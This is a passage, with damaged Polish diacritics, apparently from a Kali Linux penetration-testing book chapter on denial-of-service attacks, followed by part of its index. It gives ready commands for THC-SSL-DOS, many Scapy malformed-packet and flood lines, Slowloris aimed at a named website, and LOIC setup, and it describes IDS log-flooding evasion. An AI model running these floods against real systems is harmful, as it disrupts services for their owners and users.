i nie zwraca uwagi na to czy jego dzia ania spowoduj zak oacutecenia w funkcjonowaniu atako-wanego systemu je eli tylko takie post powanie b dzie dla niego korzystne Czasami zdarzasi nawet e napastnik b dzie wr cz za wszelk cen szuka mo liwo ci zak oacutecenia dzia aniaczy nawet ca kowitego wy czenia atakowanego systemu Z tego powodu w niektoacuterych przypad-kach przeprowadzenie testoacutew odporno ci danej witryny czy aplikacji internetowej na ataki typuDoS (ang Denial of Service) mo e by bardzo po dane Testy tego rodzaju cz sto s nazywanetestami warunkoacutew skrajnych lub testami odporno ci na przeci enie systemu (ang stress testing)
Jedn z najwa niejszych spraw zwi zanych z testami odporno ci na ataki typu DoS jest bezwzgl dne uzyska-nie pisemnej zgody w a ciciela systemu na przeprowadzanie takich atakoacutew Niektoacutere metody atakoacutewmog mie negatywny wp yw na funkcjonowanie systemu nawet po zako czeniu testoacutew Dobrym roz-wi zaniem jest przeprowadzanie takich testoacutew na systemach z redundancj systemach nieprodukcyj-nych czy systemach zainstalowanych w rodowisku laboratoryjnym o ile to oczywi cie mo liwe
Najcz ciej spotykana metoda ataku DoS polega na bdquozalewaniurdquo badanego systemu masowonap ywaj cymi z zewn trz daniami Takie przeci enie zazwyczaj skutecznie uniemo liwiasystemowi odpowiadanie na rzeczywiste dania od autoryzowanych klientoacutew lub co najmniejtak spowalnia wysy anie odpowiedzi e ca y system staje si dla klientoacutew praktycznie bezu-yteczny Ataki typu DoS mog by skierowane na zasoby systemu (np przypisana przestrze
dyskowa przepustowo po cze sieciowych itd) konfiguracj systemu (np usuwanie tablicroutingu) informacje o stanie systemu (np resetowanie sesji TCP) oraz ka dy inny elementrodowiska systemu ktoacuterego przeci enie mo e spowodowa zak oacutecenie jego normalnego
funkcjonowania
Roacute nica pomi dzy atakami DoS (ang Denial of Service) a DDoS (ang Distributed Denial of Service) polega natym e do przeprowadzania ataku DoS napastnik wykorzystuje tylko jeden komputer podczas gdy w przy-padku atakoacutew DDoS liczba maszyn bior cych udzia w ataku mo e si ga tysi cy Omawianie zagadniezwi zanych z atakami DDoS wykracza niestety daleko poza ramy naszej ksi ki
Istniej cztery g oacutewne kategorie atakoacutew DoSDDoS Ataki wykorzystuj ce przeci enie po cze sieciowych (ang Volume Based
Attacks) mdash taki rodzaj ataku jest zwi zany z bdquozalewaniemrdquo atakowanego systemumasowo nap ywaj cymi pakietami UDP ICMP i innymi Celem takiego ataku jestprzeci enie po cze sieciowych atakowanego systemu nadmiernymi ilo ciamiprzesy anych pakietoacutew
Ataki na protoko y komunikacyjne (ang Protocol Attacks) mdash ataki te maj na celunadmierne wykorzystywanie zasoboacutew urz dze sieciowych takich jak routeryzapory sieciowe urz dzenia roacutewnowa ce obci enie po cze sieciowychPrzyk adami atakoacutew na protoko y komunikacyjne s ataki typu SYN floodPing of Death Smurf Teardrop wymuszanie fragmentacji pakietoacutew itp
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
257
Ataki na warstw aplikacji (ang Application Layer Attacks) mdash takie ataki wykorzystujnormalny ruch sieciowy do zak oacutecenia dzia ania lub nawet spowodowania awariidanej witryny lub aplikacji internetowej Przyk adami mog by ataki typu Zero-Dayczy ataki wykorzystuj ce inne podatno ci i luki w zabezpieczeniach witryn i aplikacjiinternetowych
Ataki powoduj ce wyczerpanie zasoboacutew sesji (ang Session Exhaustion) mdash takieataki powoduj wyczerpanie liczby dozwolonych jednocze nie sesji poprzez ci g enawi zywanie nowych po cze bez zamykania starych sesji co prowadzido wyczerpania zasoboacutew systemu
W systemie Kali Linux znajdziesz wiele narz dzi pozwalaj cych na wykorzystywanie podat-no ci i luk w zabezpieczeniach Narz dzia te na przyk ad Metasploit mog by u ywane doprzeprowadzania atakoacutew DoS na warstw aplikacji (wiele z tych narz dzi omawiali my ju wewcze niejszych rozdzia ach) W rozdziale 3 prezentowali my popularne narz dzie Scapypozwalaj ce na przeprowadzanie atakoacutew DoS na protoko y komunikacyjne Poni ej znaj-dziesz omoacutewienie kilku kolejnych narz dzi s u cych do przeprowadzania atakoacutew DoS ktoacuteremo esz znale w systemie Kali Linux
Aby przetestowa skuteczno ataku DoS mo esz u y witryny httpwwwupordownorg ktoacutera sprawdzadost pno podanej witryny internetowej
THX-SSL-DOSProtokoacute SSL (ang Secure Socket Layer) jest u ywany do nawi zywania bezpiecznych po -cze i transakcji w internecie Nawi zanie bezpiecznego po czenia z wykorzystaniem proto-ko u SSL wymaga u ycia po stronie serwera 15 razy wi kszej mocy obliczeniowej ni po stro-nie klienta Atak typu THC-SSL-DOS wykorzystuje t dysproporcj przez proacuteb prze adowaniaserwera spreparowanymi daniami nawi zania sesji SSL a do momentu kiedy przeci onyserwer si poddaje i przestaje odpowiada na dania przesy ane od innych autoryzowanychklientoacutew Atak wykorzystuje mechanizm renegocjacji bezpiecznego po czenia SSL do gene-rowania tysi cy takich da dla pojedynczego po czenia TCP Z tego powodu atak ten jestroacutewnie znany jako atak typu SSL-Exhaustion (ang mdash bdquowyczerpanie zasoboacutew SSLrdquo) Zalettakiego podej cia jest to e mo liwo ci przetwarzania da nawi zania sesji SSL s znaczniewy sze po stronie klienta co oznacza e przeci tny laptop pod czony do sieci za po red-nictwem cza o przeci tnej szybko ci mo e rzuci powa ne wyzwanie niemal ka demu serwero-wi aplikacji internetowych Podatno serweroacutew internetowych na ataki typu SSL-Exhaustionjest powszechnie znana a mimo to nie uda o si jeszcze opracowa skutecznej metody zapo-biegania takim atakom
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
258
Aby uruchomi pakiet THC-SSL-DOS w menu g oacutewnym systemu przejd do grupy Kali Linuxa nast pnie wybierz polecenie Stress TestingWeb Stress Testingthc-ssl-dos Po wybraniu pole-cenia pojawi si nowe okno terminala z ekranem powitalnym polecenia thc-ssl-dos Sk adniapolecenia jest nast puj ca
thc-ssl-dos [opcje] ltadres IP ofiarygt ltportgt and --accept
W wierszu wywo ania polecenia musisz umie ci opcj --accept w przeciwnym wypadku otrzymaszkomunikat o b dzie przedstawiony poni ej
Po uruchomieniu programu THC-SSL-DOS zobaczysz na ekranie kilka zabawnych komuni-katoacutew informuj cych e dzia anie programu si rozpocz o Na pierwszym rysunku zamiesz-czonym poni ej wida e zaatakowana witryna nie obs uguje protoko u SSL st d programwy wietla na ekranie komunikat o wyst pieniu b du Na kolejnym rysunku przedstawionosytuacj w ktoacuterej pomy lnie rozpocz si proces renegocjacji sesji SSL co w efekcie mo edoprowadzi do zak oacutecenia dzia ania atakowanego systemu Pami taj ataki tego typu mo eszprzeprowadza tylko na systemach dla ktoacuterych uzyska e pisemne zezwolenie w a cicielaPrzeprowadzenie takiego ataku mo e doprowadzi do powa nego ograniczenia funkcjonalno-ci atakowanego systemu lub nawet do jego ca kowitego za amania
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
259
ScapyJednym z najpopularniejszych narz dzi s u cych do przeprowadzania atakoacutew typu DoS jestScapy Program zosta napisany w j zyku Python a jego autorem jest Phillippe Biondi Scapypozwala na tworzenie modyfikowanie i dekodowanie zawarto ci pakietoacutew sieciowych wstrzyki-wanie pakietoacutew do sieci przechwytywanie pakietoacutew oraz dopasowywanie da i odpowiedziProgram posiada roacutewnie wiele innych mechanizmoacutew takich jak skanowanie portoacutew traso-wanie pakietoacutew sprawdzanie urz dze sieciowych przeprowadzanie atakoacutew czy wykrywanieurz dze sieciowych
Jedn z cz sto wykonywanych operacji jest przechwytywanie pakietoacutew TCP i wysy anie ichdalej do sieci za po rednictwem programu Scapy Aby uruchomi ten program w oknie ter-minala wpisz polecenie scapy Po uruchomieniu programu b dziesz moacuteg wykonywa pole-cenia bezpo rednio z jego wiersza polece
W przyk adzie ktoacutery przedstawiamy poni ej sproacutebujemy u y pakietu Scapy do wysy aniaspreparowanych pakietoacutew TCP do naszego serwera testowego W naszym przypadku serwertestowy ma adres IP 10001 ale w realnym scenariuszu mo e to by dowolny router czyserwer WWW Oproacutecz podania adresu atakowanego serwera musimy roacutewnie okre li liczbpakietoacutew ktoacutere zostan wys ane do celu W naszym przypadku b dzie to 2000 pakietoacutew cze-go mo emy dokona za pomoc nast puj cego polecenia
send(IP(dst=10001ttl=0)TCP()iface=eth0count=2000)
Powoduje ono wys anie 2000 pakietoacutew z interfejsu sieciowego eth0 do serwera o adresie10001 Jak zapewne zauwa y e czas ycia wysy anych pakietoacutew (parametr ttl) jest ustawio-ny na warto 0 Z punktu widzenia protoko u TCP istnienie takich pakietoacutew jest niemo liweInaczej moacutewi c wysy aj c pakiety z tak spreparowan warto ci parametru ttl proacutebujemywprowadzi atakowany serwer internetowy co najmniej w zak opotanie W realnym scenariu-szu potencjalny napastnik wysy a by do atakowanego serwera miliony takich pakietoacutew Wartozauwa y e w sprzyjaj cych okoliczno ciach zak oacutecenie pracy czy nawet powa na awaria serweramo e by spowodowana odebraniem nawet jednego niepoprawnego czy specjalnie z o liwiespreparowanego pakietu sieciowego Oczywi cie w zale no ci od zamiaroacutew mo esz dowolniemodyfikowa poszczegoacutelne opcje wysy ania pakietoacutew
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
260
Poni ej przedstawiamy kilkana cie popularnych scenariuszy atakoacutew przeprowadzanych przyu yciu pakietu Scapy
Nieprawid owa wersja protoko u IP
send(IP(dst=10001 src=10203040 version=0) TCP(dport=www) iface=eth0 count=2000)
Nieprawid owa suma kontrolna pakietu TCP
send(IP(dst=10001)TCP(chksum=0x5555)iface=eth0count=2000)
Nieprawid owe flagi pakietu TCP (wszystkie flagi wyzerowane i numer sekwencji usta-wiony na 0)
send(IP(dst=10001)TCP(flags=seq=555)iface=eth0 count=2000)
Nieprawid owe flagi pakietu TCP (wszystkie flagi ustawione jednocze nie)
send(IP(dst=10001)TCP(flags=0x0ff)iface=eth0count=2000)
Ustawiona tylko flaga FIN
send(IP(dst=10001)TCP(flags=F)iface=eth0count=2000)
Rozmiar nag oacutewka wi kszy od rozmiaru pakietu L2
send(IP(dst=10001 src=10203040 ihl=15L)TCP(dport=www) iface=eth0 count=2000)
Zbyt ma y rozmiar nag oacutewka pakietu
send(IP(dst=10001 src=10203040 ihl=2L)TCP(dport=www) iface=eth0 count=2000)
ICMP Flood
send(IP(dst=10001)ICMP()iface=eth0count=2000)
Nieprawid owa suma kontrolna pakietu IP
send(IP(dst=10001 src=10203040 chksum=0x5500) TCP(dport=www) iface=eth0 count=2000)
Fragmentacja pakietoacutew IP
send(IP(dst=10001 src=10203040 frag=1)TCP(dport=www) iface=eth0 count=2000)
Rozmiar pakietu IP wi kszy ni rozmiar pakietu warstwy L2
send(IP(dst=10001 src=10203040 ihl=5L len=80) TCP(dport=www) iface=eth0 count=2000)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
261
roacuted owy adres IP taki sam jak docelowy adres IP
send(IP(dst=10001 src=10001)TCP(dport=www) iface=eth0 count=2000)
Rozmiar pakietu warstwy L2 wi kszy ni rozmiar pakietu IPsend(IP(dst=10001len=32) Raw(load=bla-bla-bla-bla-bla-blabla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)UDP(dport=80len=48) Raw(load=bla-bla-bla-bla-bla-bla-bla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)ICMP() Raw(load=bla-bla-bla-blabla-bla-bla-bla)iface=eth0count=2000)
Brak pakietu warstwy L4
send(IP(dst=10001 src=10203040) iface=eth0 count=2000)
Jednocze nie ustawione flagi SYN i FIN
send(IP(dst=10001)TCP(flags=FS)iface=eth0count=2000)
Rozmiar nag oacutewka pakietu TCP wi kszy ni rozmiar pakietu warstwy L2
send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=15L) iface=eth0 count=2000)
Zbyt ma y rozmiar nag oacutewka TCP (mniejszy ni 5 bajtoacutew)
send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=1L) iface=eth0 count=2000)
Slowloris
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
262
Slowloris to klient HTTP ktoacutery umo liwia przeprowadzanie atakoacutew typu DoS nawet za po-rednictwem cza o wzgl dnie ma ej przepustowo ci Metoda ataku wykorzystywana w tym
programie jest unikatowa i pozwala na przeprowadzenie skutecznego ataku bez uciekania sido powszechnie wykorzystywanych technik bdquozalewaniardquo serweroacutew masowo wysy anymi pa-kietami Slowloris otwiera wiele roacutewnoleg ych po cze do atakowanego serwera i podtrzy-muje je w otwartym stanie poprzez przesy anie cz ciowych da HTTP Po otwarciu po -czenia program cyklicznie w regularnych odst pach czasu przesy a do serwera setkikolejnych nag oacutewkoacutew da co zapobiega zamkni ciu po czenia przez serwer Takie zacho-wanie powoduje wyczerpanie limitu roacutewnoleg ych sesji serwera co w efekcie uniemo liwiajego normalne dzia anie W przypadku witryn sieciowych przystosowanych do du ego nat -enia ruchu proces przejmowania kolejnych po cze przez pakiet Slowloris mo e zaj nieco
czasu poniewa inni u ytkownicy musz zwalnia swoje po czenia zanim b d one mog yzosta zaj te przez Slowloris Nie zmienia to jednak w niczym faktu e po pewnym czasieSlowloris poma u ale skutecznie przechwyci wszystkie dost pne sesje i doprowadzi do za-wieszenia dzia ania serwera
Program Slowloris dzia a skutecznie zw aszcza w odniesieniu do serweroacutew WWW wykorzy-stuj cych przetwarzanie wielow tkowe ktoacutere s z definicji wra liwe na ograniczanie liczby do-st pnych w tkoacutew Przyk adami takich serweroacutew s Apache 1x i 2x dhttpd GoAhead i inne
Pakiet Slowloris nie jest domy lnie instalowany w systemie Kali Linux 10 ale mo esz go pobra ze stronyhttphackersorgslowloris
Aby uruchomi program pobierz skrypt pl ze strony autora otwoacuterz nowe okno terminalaprzejd do katalogu ze skryptem i wykonaj polecenie przedstawione poni ej
perl slowlorispl
W oknie terminala pojawi si ekran pomocy programu Aby rozpocz atak na wybrany serwerpowiniene wpisa polecenie przedstawione powy ej i doda opcj -dns a po niej wpisa adresserwera b d cego celem ataku Aby zaatakowa na przyk ad witryn wwwthesecuritybloggercompowiniene wpisa nast puj ce polecenie (zobacz pierwszy rysunek na nast pnej stronie)
perl slowlorispl -dns thesecuritybloggercom
Po rozpocz ciu ataku b dziesz moacuteg obserwowa w oknie terminala proces przejmowaniakolejnych po cze co po pewnym czasie mo e doprowadzi do za amania si atakowanegosystemu (zobacz drugi rysunek na nast pnej stronie)
Je eli atak przeprowadzany za pomoc pakietu Slowloris si powiedzie atakowany serwerprzestanie odpowiada na dania (zobacz trzeci rysunek na nast pnej stronie)
Powy ej mo esz zobaczy skutki ataku DoS na witryn httpwwwthesecuritybloggercom (prosimy niepowtarzaj tego eksperymentu)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
263
LOIC czyli Niskoorbitalne Dzia o JonowehellipPakiet LOIC (ang Low Orbit Ion Cannon czyli wspomniane w tytule podrozdzia u Niskoorbital-ne Dzia o Jonowe) to narz dzie do badania odporno ci zasoboacutew sieciowych na przeci enieLOIC pozwala na sprawdzanie ilo ci ruchu sieciowego jaki mo e obs u y dany system Ta-kie informacje mog by poacute niej wykorzystywane do planowania rozbudowy i wdra ania sze-rokopasmowych po cze sieciowych Program ten sta si inspiracj do utworzenia innych
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
264
narz dzi o podobnej funkcjonalno ci takich jak na przyk ad JavaScript LOIC ktoacutere pozwalau ytkownikowi na przeprowadzanie testoacutew odporno ci na przeci enia po cze bezpo red-nio z poziomu przegl darki
Program LOIC by wykorzystywany przez grup Anonymous do przeprowadzenia s ynnychatakoacutew na wiele znanych internetowych witryn publicznych i rz dowych Niektoacuterzy prawnicyusi uj co prawda przekonywa e zastosowanie narz dzi takich jak LOIC jest w praktycebardzo podobne do odwiedzania danej witryny kilka tysi cy razy ale w wi kszo ci krajoacutewnieautoryzowane u ywanie tego typu narz dzi jest traktowane jako amanie prawa
Aby zainstalowa pakiet LOIC powiniene otworzy okno terminala i wpisa sekwencj po-lece przedstawion poni ej
apt-get updateaptitude install git-core monodevelopapt-get install mono-gmcs
Po zako czeniu tego etapu wykonaj polecenie cd Desktop aby przej do katalogu reprezentuj -cego pulpit a nast pnie utwoacuterz w nim podkatalog o nazwie loic Mo esz to zrobi za pomocpolecenia przedstawionego poni ej
mkdir loic
Przejd do nowo utworzonego katalogu za pomoc polecenia cd loic i wykonaj polecenieprzedstawione poni ej
wget httpsrawgithubcomnicolargoloicinstaller masterloicsh
Nast pnie nadaj skryptowi loicsh odpowiednie uprawnienia Aby to zrobi wykonaj kolejnepolecenie
chmod 777 loicsh
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
265
Ostatnim etapem jest uruchomienie skryptu za pomoc polecenia przedstawionego poni ej
loicsh install
Je eli na ekranie nie pojawi si aden komunikat o wyst pieniu b du to znaczy e jestegotowy do przeprowadzenia aktualizacji naszego bdquodzia a jonowegordquo Aby to zrobi wykonajnast puj ce polecenie
loicsh update
Po zako czeniu aktualizacji nadszed czas na uruchomienie programu LOIC Mo esz to zro-bi wpisuj c w oknie terminala nast puj ce polecenie
loicsh run
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
266
U ywanie programu LOIC nie jest trudne Na pocz tek mo esz wybra czy chcesz korzystaz trybu r cznego (ang manual mode) czy trybu IRC (ang IRC mode) W naszym przyk adziewybrali my tryb r czny
Nast pnie powiniene poda adres URL systemu ktoacutery chcesz zaatakowa W naszym przypadkuwpisali my adres lokalnego interfejsu p tli zwrotnej czyli 127001 Je eli chcesz zmodyfi-kowa domy lne ustawienia ataku LOIC oferuje wiele opcji dla protoko oacutew TCP oraz UDP
Kiedy b dziesz gotowy do rozpocz cia ataku powiniene klikn przycisk IMMA CHARGINMAH LAZER Post py ataku mo esz obserwowa w oknie programu Aby zatrzyma atakkliknij przycisk Stop Flooding
Inne narz dziaKali Linux oferuje inne narz dzia ktoacutere mo esz wykorzysta do przeprowadzania atakoacutew naaplikacje internetowe Poni ej zamieszczamy kroacutetkie zestawienie wybranych narz dzi ktoacuterenie by y do tej pory omawiane
DNSChef
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
267
Pakiet DNSChef to serwer DNS proxy przeznaczony dla pentesteroacutew i specjalistoacutew zajmuj -cych si analiz z o liwego oprogramowania Serwery DNS proxy to narz dzia bdquofa szuj cerdquoodpowiedzi DNS wykorzystywane do analizy ruchu sieciowego generowanego przez aplika-cje internetowe i wielu innych zastosowa DNS (ang Domain Name System) to rozproszonysystem przydzielania nazw zasoboacutew sieciowych takich jak komputery serwery us ugi siecio-we i inne zasoby sieciowe pod czone do internetu lub prywatnych sieci komputerowychCelowe dostarczanie fa szywych adresoacutew DNS mo e powodowa przekierowanie ruchu sie-ciowego do lokalizacji zupe nie innych ni oryginalne
Na przyk ad serwer DNS proxy mo e by wykorzystywany do utworzenia fa szywych odpo-wiedzi DNS powoduj cych e ruch dedykowany dla witryny CzarnyCharaktercom zamiastdo internetu b dzie trafia do lokalnego komputera analityka gdzie mo e by blokowany lubprzechwytywany w celu przeprowadzenia dok adniejszej analizy Aby to zrobi musisz uzy-ska dost p do jednego z serweroacutew DNS i odpowiednio zmodyfikowa wpisy DNS lub doko-na bdquozatruciardquo serwera DNS tak aby ruch sieciowy by przekierowywany do Twojego kom-putera z systemem Kali Linux Sama obs uga narz dzia DNSChef nie jest skomplikowanaaczkolwiek prawdziwym wyzwaniem mo e by atak na serwer DNS i przekierowanie ruchudo Twojego komputera
SniffJoke
SniffJoke pozwala na zupe nie przezroczyste przechwytywanie po cze TCP wprowadzaniedo nich opoacute nie modyfikowanie zawarto ci pakietoacutew oraz wstrzykiwanie fa szywych spre-parowanych pakietoacutew do sesji TCP u ytkownika Powoduje to e pasywne rozwi zania mo-nitoruj ce i zabezpieczaj ce ruch sieciowy takie jak systemy IDSIPS i sniffery maj du eproblemy z poprawn interpretacj po cze sieciowych Dzia anie programu wywo uje roacute -nice mi dzy ruchem sieciowym ktoacutery jest przechwytywany i przewidywany przez sniffera rzeczywistym ruchem sieciowym generowanym przez klienta w rezultacie czego algorytmybuduj ce bdquokonwersacjerdquo sieciowe dla sniffera maj problemy z poprawnym sk adaniem kolej-no ci pakietoacutew Na kolejnych dwoacutech rysunkach przedstawiamy proces przechwytywania ru-chu sieciowego mi dzy dwoma u ytkownikami bez udzia u pakietu SniffJoke oraz w sytuacjikiedy pakiet SniffJoke dzia a
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
268
SiegeSiege to narz dzie przeznaczone do testowania odporno ci na przeci enia po czeHTTPHTTPS pozwalaj ce deweloperom aplikacji internetowych na sprawdzanie zachowa-nia kodu aplikacji w skrajnych warunkach pracy Program Siege pozwala na wielow tkowegenerowanie sesji HTTP i analizowanie zachowania serweroacutew pod symulowanym obci eniemwielu u ytkownikoacutew Siege mo e pracowa w trybie regresji symulacji internetu oraz w trybiebrute-force
Aby uruchomi program Siege w systemie Kali Linux przejd do grupy Kali Linux i nast p-nie wykonaj polecenie Stress TestingNetwork Stress Testingsiege (zobacz pierwszy rysunekna nast pnej stronie)
Sk adnia wywo ania polecenia siege jest nast puj ca
siege [opcje] ltadres URL celugt
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
269
Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-
nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku
InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
270
wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS
TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych
Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci
PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce
W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia
W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew
Kup książkę Poleć książkę
Skorowidz
Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275
harmonogram 276zabezpiecze systemu 276
ALE 31analiza
bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych
zawieraj cychoprogramowanie firmware298
ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat
299zawarto ci plikoacutew PDF 299
da HTTP 203aplet Java 156aplikacje internetowe 23
b dy w zabezpieczeniach286
wykrywanie i mapowanie 241zakres testoacutew penetracyjnych
23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212
ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki
brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji
internetowych 147na parametry metod GET
i POST 131na protoko y komunikacyjne
256na serwery aplikacji
internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie
zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151
amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257
wykorzystuj ce przeci eniepo cze sieciowych 256
XSS 223 248z klonowaniem 151z u yciem narz dzi
penetracyjnych opartychna przegl darkach 236
audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301
Authentication hijacking 225Autopsy 295AV 31
BBackTrack 38badanie zasoboacutew sieci
komputerowych 65bazy danych 218BeEF 232
panel zarz dzania pakietu 234przechwycony system 235
bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272
a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania
i urz dze 274podstawowe wymogi 273
bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych
288 291narz dzia 293partycje 292suma kontrolna 294
Kup książkę Poleć książkę
Skorowidz
330
black-box 24 30BootKey 171 173Browser Exploitation
Framework 232brute-force 125 170
amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238
Intercept 241opcje konfiguracyjne 239
Burp Spider 241 244Burp Suite 238
Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty
CEH 311CISSP 31 193g oacutewnego urz du certyfikacji
106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282
chkrootkit 295chntpw 180
uruchomienie w Kali Linux182
ciasteczka 197edytowanie zawarto ci 199
201niezabezpieczone 208obrona przed
przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200
ci g zaburzaj cy 170Cisco Network Foundation
Protection 275CISSP 193Clickjacking 196
kod roacuted owy stron 197obrona przed atakiem 287
CmosPwd 190
Cookie Cadger 203dane o sesji 204
Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185
znaki specjalne 186CutyCapt 327czarne pude ko 24
DDBPwAudit 229dc3dd 293 297dd 291DDoS 256
kategorie atakoacutew 256obrona przed atakiem 285
Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128
raport 130Distributed Denial of Service
256DNS 267DNSChef 266dokumentacja 306DoS 256
kategorie atakoacutew 256obrona przed atakiem 285
dost p do systemualternatywny 37techniki XSS 225
dost pno 30Dradis 325Driftnet 217dsniff 212
nas uchiwaniei przechwytywaniepakietoacutew 213
uruchamianie 214dual-boot configuration 44
EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate
Authority 282Ettercap 214
lista celoacutew 216skanowanie sieci 216
Exploitation Tools 36 37 48exploity 92 113
Reserve_TCP Meterpreter156
Ffa szywe
adresy IP 285odpowiedzi DNS 267witryny 159 252
Ferret 209uruchamianie 210
FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84
utworzenie nowego projektu84
Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170
kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93
Ggenerator
hase 278adunkoacutew 132
GHDB 63GIT 250glosariusz 319
Kup książkę Poleć książkę
Skorowidz
331
Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246
instancja projektu 225
HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137
dost pu 250generowanie listy 185amanie 169
